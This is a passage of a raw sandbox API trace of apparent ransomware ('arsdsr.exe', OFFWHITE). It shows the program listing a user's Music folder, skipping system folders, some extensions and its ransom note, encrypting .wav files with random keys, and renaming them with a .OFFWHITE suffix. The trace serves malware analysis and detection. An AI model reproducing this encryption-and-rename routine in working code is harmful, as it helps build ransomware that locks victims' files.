ftLastWriteTime.dwLowDateTime=0xdba02e20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0134.596] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0134.596] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0134.596] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1fcf2f0, ftCreationTime.dwHighDateTime=0x1d5e4ac, ftLastAccessTime.dwLowDateTime=0x49743f50, ftLastAccessTime.dwHighDateTime=0x1d5ddb2, ftLastWriteTime.dwLowDateTime=0x49743f50, ftLastWriteTime.dwHighDateTime=0x1d5ddb2, nFileSizeHigh=0x0, nFileSizeLow=0xef36, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="1CD0SbkBI.wav", cAlternateFileName="1CD0SB~1.WAV")) returned 1 [0134.596] lstrcmpiW (lpString1="1CD0SbkBI.wav", lpString2=".") returned 1 [0134.597] lstrcmpiW (lpString1="1CD0SbkBI.wav", lpString2="..") returned 1 [0134.597] lstrcmpiW (lpString1="1CD0SbkBI.wav", lpString2="...") returned 1 [0134.597] lstrcmpiW (lpString1="1CD0SbkBI.wav", lpString2="windows") returned -1 [0134.597] lstrcmpiW (lpString1="1CD0SbkBI.wav", lpString2="$recycle.bin") returned 1 [0134.597] lstrcmpiW (lpString1="1CD0SbkBI.wav", lpString2="rsa") returned -1 [0134.597] lstrcmpiW (lpString1="1CD0SbkBI.wav", lpString2="ntuser.dat") returned -1 [0134.597] lstrcmpiW (lpString1="1CD0SbkBI.wav", lpString2="programdata") returned -1 [0134.597] lstrcmpiW (lpString1="1CD0SbkBI.wav", lpString2="appdata") returned -1 [0134.597] lstrcmpiW (lpString1="1CD0SbkBI.wav", lpString2="program files") returned -1 [0134.597] lstrcmpiW (lpString1="1CD0SbkBI.wav", lpString2="program files (x86)") returned -1 [0134.597] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0134.597] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="1CD0SbkBI.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\1CD0SbkBI.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\1CD0SbkBI.wav" [0134.597] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.597] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.597] PathFindExtensionW (pszPath="1CD0SbkBI.wav") returned=".wav" [0134.597] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0134.597] lstrcmpiW (lpString1=".wav", lpString2=".log") returned 1 [0134.597] lstrcmpiW (lpString1=".wav", lpString2=".cab") returned 1 [0134.597] lstrcmpiW (lpString1=".wav", lpString2=".cmd") returned 1 [0134.597] lstrcmpiW (lpString1=".wav", lpString2=".com") returned 1 [0134.597] lstrcmpiW (lpString1=".wav", lpString2=".cpl") returned 1 [0134.597] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0134.597] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0134.597] lstrcmpiW (lpString1=".wav", lpString2=".url") returned 1 [0134.597] lstrcmpiW (lpString1=".wav", lpString2=".ttf") returned 1 [0134.597] lstrcmpiW (lpString1=".wav", lpString2=".mp3") returned 1 [0134.597] lstrcmpiW (lpString1=".wav", lpString2=".pif") returned 1 [0134.598] lstrcmpiW (lpString1=".wav", lpString2=".mp4") returned 1 [0134.598] lstrcmpiW (lpString1=".wav", lpString2=".OFFWHITE") returned 1 [0134.598] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0134.598] lstrcmpiW (lpString1="1CD0SbkBI.wav", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0134.598] GetProcessHeap () returned 0x500000 [0134.598] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5317a0 [0134.598] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\1CD0SbkBI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1cd0sbkbi.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0134.601] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=61238) returned 1 [0134.601] GetProcessHeap () returned 0x500000 [0134.601] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.601] GetProcessHeap () returned 0x500000 [0134.601] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.601] GetProcessHeap () returned 0x500000 [0134.601] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.601] GetProcessHeap () returned 0x500000 [0134.601] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.601] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.601] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.601] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.601] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.601] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.601] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.601] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.601] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.601] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0134.602] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.602] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.602] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0134.602] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xef36, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.602] SetLastError (dwErrCode=0x0) [0134.602] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.667] GetLastError () returned 0x0 [0134.667] GetLastError () returned 0x0 [0134.667] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xf036, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.668] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.668] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xf136, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.668] WriteFile (in: hFile=0xb0, lpBuffer=0x5317a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5317a0*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0134.668] GetProcessHeap () returned 0x500000 [0134.668] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xef36) returned 0x55a7b8 [0134.668] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.668] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xef36, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0xef36, lpOverlapped=0x0) returned 1 [0134.673] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.673] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xef36, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0xef36, lpOverlapped=0x0) returned 1 [0134.674] GetProcessHeap () returned 0x500000 [0134.674] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0134.674] CloseHandle (hObject=0xb0) returned 1 [0134.779] GetProcessHeap () returned 0x500000 [0134.779] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.779] GetProcessHeap () returned 0x500000 [0134.779] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.779] GetProcessHeap () returned 0x500000 [0134.779] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.779] GetProcessHeap () returned 0x500000 [0134.779] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.779] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\1CD0SbkBI.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\1CD0SbkBI.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\1CD0SbkBI.wav" [0134.779] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\1CD0SbkBI.wav", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\1CD0SbkBI.wav.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\1CD0SbkBI.wav.OFFWHITE" [0134.779] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\1CD0SbkBI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1cd0sbkbi.wav"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\1CD0SbkBI.wav.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1cd0sbkbi.wav.offwhite")) returned 1 [0134.780] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa70f4d60, ftCreationTime.dwHighDateTime=0x1d5df85, ftLastAccessTime.dwLowDateTime=0x824cc430, ftLastAccessTime.dwHighDateTime=0x1d5d850, ftLastWriteTime.dwLowDateTime=0x824cc430, ftLastWriteTime.dwHighDateTime=0x1d5d850, nFileSizeHigh=0x0, nFileSizeLow=0xb509, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="bX5md6vIXDhODOwWo.wav", cAlternateFileName="BX5MD6~1.WAV")) returned 1 [0134.780] lstrcmpiW (lpString1="bX5md6vIXDhODOwWo.wav", lpString2=".") returned 1 [0134.780] lstrcmpiW (lpString1="bX5md6vIXDhODOwWo.wav", lpString2="..") returned 1 [0134.780] lstrcmpiW (lpString1="bX5md6vIXDhODOwWo.wav", lpString2="...") returned 1 [0134.780] lstrcmpiW (lpString1="bX5md6vIXDhODOwWo.wav", lpString2="windows") returned -1 [0134.780] lstrcmpiW (lpString1="bX5md6vIXDhODOwWo.wav", lpString2="$recycle.bin") returned 1 [0134.780] lstrcmpiW (lpString1="bX5md6vIXDhODOwWo.wav", lpString2="rsa") returned -1 [0134.780] lstrcmpiW (lpString1="bX5md6vIXDhODOwWo.wav", lpString2="ntuser.dat") returned -1 [0134.780] lstrcmpiW (lpString1="bX5md6vIXDhODOwWo.wav", lpString2="programdata") returned -1 [0134.780] lstrcmpiW (lpString1="bX5md6vIXDhODOwWo.wav", lpString2="appdata") returned 1 [0134.780] lstrcmpiW (lpString1="bX5md6vIXDhODOwWo.wav", lpString2="program files") returned -1 [0134.780] lstrcmpiW (lpString1="bX5md6vIXDhODOwWo.wav", lpString2="program files (x86)") returned -1 [0134.780] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0134.781] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="bX5md6vIXDhODOwWo.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\bX5md6vIXDhODOwWo.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\bX5md6vIXDhODOwWo.wav" [0134.781] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.781] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.781] PathFindExtensionW (pszPath="bX5md6vIXDhODOwWo.wav") returned=".wav" [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".log") returned 1 [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".cab") returned 1 [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".cmd") returned 1 [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".com") returned 1 [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".cpl") returned 1 [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".url") returned 1 [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".ttf") returned 1 [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".mp3") returned 1 [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".pif") returned 1 [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".mp4") returned 1 [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".OFFWHITE") returned 1 [0134.781] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0134.781] lstrcmpiW (lpString1="bX5md6vIXDhODOwWo.wav", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0134.781] GetProcessHeap () returned 0x500000 [0134.781] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5317b0 [0134.781] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\bX5md6vIXDhODOwWo.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\bx5md6vixdhodowwo.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0134.782] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=46345) returned 1 [0134.782] GetProcessHeap () returned 0x500000 [0134.782] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.782] GetProcessHeap () returned 0x500000 [0134.782] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.782] GetProcessHeap () returned 0x500000 [0134.782] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.782] GetProcessHeap () returned 0x500000 [0134.782] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.782] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.782] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.782] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.782] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.782] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.782] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.782] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.782] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.782] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0134.783] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.783] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.783] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0134.783] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xb509, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.783] SetLastError (dwErrCode=0x0) [0134.783] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.788] GetLastError () returned 0x0 [0134.788] GetLastError () returned 0x0 [0134.788] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xb609, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.788] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.788] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xb709, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.788] WriteFile (in: hFile=0xb0, lpBuffer=0x5317b0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5317b0*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0134.788] GetProcessHeap () returned 0x500000 [0134.788] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xb509) returned 0x55a7b8 [0134.788] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.788] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xb509, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0xb509, lpOverlapped=0x0) returned 1 [0134.792] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.792] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xb509, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0xb509, lpOverlapped=0x0) returned 1 [0134.792] GetProcessHeap () returned 0x500000 [0134.793] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0134.793] CloseHandle (hObject=0xb0) returned 1 [0134.794] GetProcessHeap () returned 0x500000 [0134.794] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.794] GetProcessHeap () returned 0x500000 [0134.794] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.794] GetProcessHeap () returned 0x500000 [0134.794] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.794] GetProcessHeap () returned 0x500000 [0134.794] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.794] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\bX5md6vIXDhODOwWo.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\bX5md6vIXDhODOwWo.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\bX5md6vIXDhODOwWo.wav" [0134.794] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\bX5md6vIXDhODOwWo.wav", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\bX5md6vIXDhODOwWo.wav.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\bX5md6vIXDhODOwWo.wav.OFFWHITE" [0134.794] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\bX5md6vIXDhODOwWo.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\bx5md6vixdhodowwo.wav"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\bX5md6vIXDhODOwWo.wav.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\bx5md6vixdhodowwo.wav.offwhite")) returned 1 [0134.795] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0134.795] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0134.795] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0134.795] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0134.795] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0134.795] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0134.795] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0134.795] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0134.795] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0134.795] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0134.795] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0134.796] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0134.796] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0134.796] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" [0134.796] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.796] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.796] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0134.796] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0134.796] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0134.796] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0134.796] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0134.796] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0134.796] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0134.796] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0134.796] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3fd8d110, ftCreationTime.dwHighDateTime=0x1d5e143, ftLastAccessTime.dwLowDateTime=0x9e9cd480, ftLastAccessTime.dwHighDateTime=0x1d5e5e4, ftLastWriteTime.dwLowDateTime=0x9e9cd480, ftLastWriteTime.dwHighDateTime=0x1d5e5e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="GCchq", cAlternateFileName="")) returned 1 [0134.796] lstrcmpiW (lpString1="GCchq", lpString2=".") returned 1 [0134.796] lstrcmpiW (lpString1="GCchq", lpString2="..") returned 1 [0134.796] lstrcmpiW (lpString1="GCchq", lpString2="...") returned 1 [0134.796] lstrcmpiW (lpString1="GCchq", lpString2="windows") returned -1 [0134.796] lstrcmpiW (lpString1="GCchq", lpString2="$recycle.bin") returned 1 [0134.796] lstrcmpiW (lpString1="GCchq", lpString2="rsa") returned -1 [0134.796] lstrcmpiW (lpString1="GCchq", lpString2="ntuser.dat") returned -1 [0134.796] lstrcmpiW (lpString1="GCchq", lpString2="programdata") returned -1 [0134.796] lstrcmpiW (lpString1="GCchq", lpString2="appdata") returned 1 [0134.796] lstrcmpiW (lpString1="GCchq", lpString2="program files") returned -1 [0134.796] lstrcmpiW (lpString1="GCchq", lpString2="program files (x86)") returned -1 [0134.796] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0134.797] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="GCchq" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq" [0134.797] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\" [0134.797] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\" [0134.797] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\*.*" [0134.797] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\*.*", 